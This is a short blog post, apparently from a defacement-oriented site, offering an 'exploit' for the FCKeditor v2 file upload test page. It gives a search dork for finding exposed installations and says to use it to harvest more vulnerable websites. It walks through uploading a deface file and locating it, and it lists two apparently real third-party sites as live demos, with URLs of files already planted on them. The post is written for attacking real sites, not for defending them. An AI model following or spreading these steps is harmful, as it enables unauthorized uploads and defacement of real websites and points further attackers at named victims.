FCKeditor v2 remote File Upload Exploit
Section: Exploit
Google and Bing Dork: intitle:"FCKeditor - Uploaders Tests"
Catagory : Remote Upload
Exploit : http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Publisher : www.devilscafe.in
Go to Google.com or Bing.com and type this Dork : intitle:"FCKeditor - Uploaders Tests"
(use both serach enigines for getting more vulnrable websites)
now you'll Got FCK editor upload option, and you can get Upload option by going to this URL
http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Now chnage Select the "File Uploader" to use into PHP
Then Select your .txt deface and click on send it to the server (some websites allowed you to upload .html and .jpg files)
if your file sucessfully uploaded, you will got "File uploaded with no errors" Alert
to View your file see Uploaded File URL
or go to http://www.website.domain/userfiles/yourfilehereor http://www.website.domain/path/userfiles/yourfilehere
Live Demo : http://www.relationshiptrends.com/affiliate/fckeditor/editor/filemanager/connectors/uploadtest.html
http://minisite.nku.edu.tr/fckeditor/editor/filemanager/connectors/uploadtest.html
Result :
http://minisite.nku.edu.tr//userfiles/aaaaaaaa.txt
http://www.relationshiptrends.com/affiliate/img/aaaaaaaa.txt
I Spend my 30 minutes in writing this post
please Spent your 30 secondes and write a Comment below, do You like New Design of devil's Cafe ?
and do you want any chnage ? and what about loading Speed ... Please leave your answer here
No comments:
Post a Comment
Thanks for ur comments